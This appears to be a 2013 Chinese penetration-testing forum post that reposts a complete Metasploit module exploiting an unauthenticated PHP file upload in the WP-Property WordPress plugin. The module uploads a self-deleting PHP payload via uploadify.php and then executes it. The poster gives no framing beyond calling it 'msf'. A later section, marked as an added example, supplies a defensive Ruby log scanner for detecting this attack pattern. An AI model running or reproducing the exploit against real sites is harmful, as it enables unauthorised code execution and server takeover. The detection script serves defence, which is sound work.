China Network Penetration Testing Alliance

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it. I mean, it's msf.
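
For defenders, the request pattern the module above produces (a POST to uploadify.php, then a GET of a new .php file in the same directory) can be searched for in web server access logs. The following is an added example, not part of the original post or of Metasploit; it assumes Combined Log Format, and the sample log lines, the file name in them and the 300-second window are constructed for illustration.

```ruby
require 'time'

# Endpoint the module posts to (path taken from the module on this page).
UPLOADIFY = %r{/wp-content/plugins/wp-property/third-party/uploadify/uploadify\.php\z}i
# Any other .php file in that directory, the "folder" value the module submits.
# The field is client-supplied, so the POST itself is the primary signal.
DROPPED = %r{/third-party/uploadify/(?!uploadify\.php\z)[^/]+\.php\z}i
# Combined Log Format: ip - user [time] "METHOD path PROTO" status ...
LINE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) }

# Constructed sample log (documentation addresses, invented file name).
PLUGIN_DIR = '/wordpress/wp-content/plugins/wp-property/third-party/uploadify'
SAMPLE_LOG = <<~LOG
  198.51.100.20 - - [04/Jan/2013:19:39:50 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:00 +0800] "GET #{PLUGIN_DIR}/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST #{PLUGIN_DIR}/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:04 +0800] "GET #{PLUGIN_DIR}/qZxWd.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.20 - - [04/Jan/2013:20:15:00 +0800] "POST #{PLUGIN_DIR}/uploadify.php HTTP/1.1" 200 71 "-" "-"
  not a log line
LOG

# Parse one access-log line; returns nil for anything that does not fit.
def parse(line)
  m = LINE.match(line)
  return nil unless m
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4].split('?', 2).first, status: m[5].to_i }
rescue ArgumentError
  nil # unparseable timestamp
end

# One finding per successful POST to uploadify.php, escalated to
# :upload_then_exec when the same client then requests a new .php file
# from the upload directory within `window` seconds.
def scan(lines, window: 300)
  events = lines.map { |l| parse(l) }.compact.sort_by { |e| e[:time] }
  uploads = events.select { |e| e[:method] == 'POST' && e[:status] == 200 && e[:path] =~ UPLOADIFY }
  uploads.map do |up|
    hit = events.find do |e|
      e[:ip] == up[:ip] && e[:method] == 'GET' && e[:path] =~ DROPPED &&
        e[:time] >= up[:time] && e[:time] - up[:time] <= window
    end
    { ip: up[:ip], at: up[:time], file: hit && hit[:path],
      kind: hit ? :upload_then_exec : :upload_only }
  end
end

scan(SAMPLE_LOG.lines).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Because the payload in the module is generated with :unlink_self, the dropped file may no longer be on disk when the host is examined, which makes the access log the more reliable evidence.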

. Q7 _5 S/ ?" R5 w: j" k




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2